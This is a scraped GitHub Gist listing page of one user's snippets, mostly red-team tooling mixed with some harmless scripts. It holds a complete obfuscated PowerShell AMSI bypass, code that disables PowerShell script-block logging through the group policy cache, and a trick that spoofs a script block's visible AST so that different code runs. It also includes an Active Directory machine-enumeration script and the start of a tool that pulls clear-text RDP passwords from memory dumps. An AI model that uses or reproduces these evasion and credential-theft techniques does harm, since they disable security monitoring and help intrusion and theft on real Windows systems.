Skip to content

Instantly share code, notes, and snippets.

$SpoofedAst = [ScriptBlock]::Create("Write-Output 'Hello'").Ast
$ExecutedAst = [ScriptBlock]::Create("Write-Output 'My Hidden Hello Hidden'").Ast
$Ast = [System.Management.Automation.Language.ScriptBlockAst]::new($SpoofedAst.Extent,$null,$null,$null,$ExecutedAst.EndBlock.Copy(),$null)
$Sb = $Ast.GetScriptBlock()
$Sb&
Add NugetComponent Microsoft.Win32.Registry
Add NugetComponent System.Security.Cryptography.ProtectedData
Program.cs based on https://github.com/sergeig888/csharp-dpapi-PBIE/
Tested on lates version Kiteworks 8.3.0
=========================================
/* Created by Sergei Gundorov 1/2/2020
* Intent: provide sample project for encrypting secrets with DPAPI while working with
* Power BI Embedded and API tutorials and samples.
@k4nfr3
k4nfr3 / velocity.py
Last active June 30, 2023 15:02
velocity.ch daily script to repurchase my free parking as I'm using it daily
import requests
import json
# Proxy settings fo debug (with burp or other)
proxy_enable = False
proxy = {
'http': 'http://127.0.0.1:8080',
'https': 'http://127.0.0.1:8080'
}
#!/usr/bin/env python
# modifications of original script GetAdusers.py from Impacket.
# this version returns the list of last seen 24h machines
#python list_machines.py TIMATEC.local/fbu -dc-ip 192.168.16.11
#Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
#
#Password:
#[*] Querying 192.168.16.11 for information about domain.
#Name PasswordLastSet LastLogon OperatingSystemVersion OperatingSystem IP Address
#-------------------- -------------------------- -------------------------- ---------------------- --------------------------------------- ------------
#!/usr/bin/env python
from __future__ import print_function
import json
import re
import socket
import ssl
import subprocess
import sys
'ntdll.dll' '4097367' '0x3e8557'
'RegNtCallbackObjectContextCleanup' '1094975913383384674' '0xf3222cab2d35662'
'RegNtPostCreateKey' '76320549262' '0x11c50f298e'
'RegNtPostCreateKeyEx' '686884943685' '0x9fed887745'
'RegNtPostDeleteKey' '76320533467' '0x11c50eebdb'
'RegNtPostDeleteValueKey' '18545889663766' '0x10de0d2a5b16'
'RegNtPostEnumerateKey' '2060655325624' '0x1dfc8a0f1b8'
'RegNtPostEnumerateValueKey' '500739244157917' '0x1c76b70c5ebdd'
'RegNtPostFlushKey' '25440190120' '0x5ec5a7ea8'
'RegNtPostKeyHandleClose' '18545901133010' '0x10de0dd95cd2'
Scrapped from official web site: https://downloads.rclone.org/v.../SHA1SUMS
===========================================================================
Windows Clients
ecce335a75b0f8678ba0494b178f3b41309b72be rclone-current-windows-386.zip
0d9e1fd984d0ab5312060024ab6498046562c134 rclone-current-windows-amd64.zip
ecce335a75b0f8678ba0494b178f3b41309b72be rclone-v1.40-windows-386.zip
0d9e1fd984d0ab5312060024ab6498046562c134 rclone-v1.40-windows-amd64.zip
18d6a87012de120c66b5abaa97f5932fe56beee7 rclone-v1.41-windows-386.zip
6f4bee89380b70742ba7d37c80da0f0b4f890612 rclone-v1.41-windows-amd64.zip
@k4nfr3
k4nfr3 / am.ps1
Last active February 3, 2022 12:02
AMSI Bypass
Write-Host '[+] Loading AMSI Bypass...'
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x')) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U')+'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(${n`ULl},${t`RuE} )
Write-Host '[+] done' -ForegroundColor green
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
@k4nfr3
k4nfr3 / RDP_clear.py
Last active May 20, 2021 07:59
Quick python script to analyse mem dump and extract RDP clear passwords while waiting for Mimikatz to integrate it as a module
import re
from collections import namedtuple
import sys
# Clear text password recovery from mem dump as found by @jonasLyk Tweet : https://twitter.com/jonasLyk/status/1393058962942083076
# borrowed python code from Willi Ballenthin -> https://gist.github.com/williballenthin/8e3913358a7996eab9b96bd57fc59df2
# code inspired by @gentilkiwi 's video
# This is for those who like me wanted to play with this discovery a little and dirty python3 script while waiting to see another module in the great mimikatz tool
# I'm no dev so PR and constructive remarks are welcome